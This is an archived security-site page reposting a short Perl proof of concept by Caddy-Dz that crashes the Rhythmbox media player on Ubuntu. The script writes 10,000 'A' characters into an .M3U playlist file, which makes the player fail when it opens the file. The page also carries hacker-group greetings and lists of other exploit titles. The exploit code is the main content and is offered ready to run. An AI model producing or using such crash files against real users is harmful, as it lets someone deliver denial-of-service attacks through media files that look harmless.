首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rhythmbox (.m3u) Local Crash Poc
来源:islam_babia@hotmail.com 作者:Caddy-Dz 发布时间:2011-07-01  

####
# Exploit Title: Rhythmbox (.m3u) Local Crash Poc
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>  |  Caddy-Dz@exploit-id.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
# Website: www.exploit-id.com
# Category:: webapps
# Tested on: [Ubuntu 10.10 - French]
####

# Note ! : Rhythmbox Is Allready installed on Ubuntu
# Applications => Son et Vidéo => Lecteur de musique Rhythmbox

 

#!/usr/bin/perl

my $bof="\x41" x 10000;
open (FILE,">> Caddy-Dz.M3U");
print FILE $bof;
close (FILE);


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                 |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
  RmZ ...others                                                                              |
============================================================================================ |


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenSSH 3.5p1 Remote Root Expl
·Kaillera Multiple Clients Buff
·NetBSD 5.1 libc/net Stack Buff
·HP Data Protector 6.20 EXEC_CM
·OpenSSH 3.4p1 FreeBSD Remote R
·Multiple vulnerabilities in HP
·VUPlayer 2.49 Stack Buffer Ove
·HP Data Protector 6.11 Remote
·Microsoft IIS FTP Server <= 7.
·HP OmniInet.exe Opcode 27 Buff
·Donar Player 2.8.0 Denial of S
·MS Office 2010 RTF Header Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved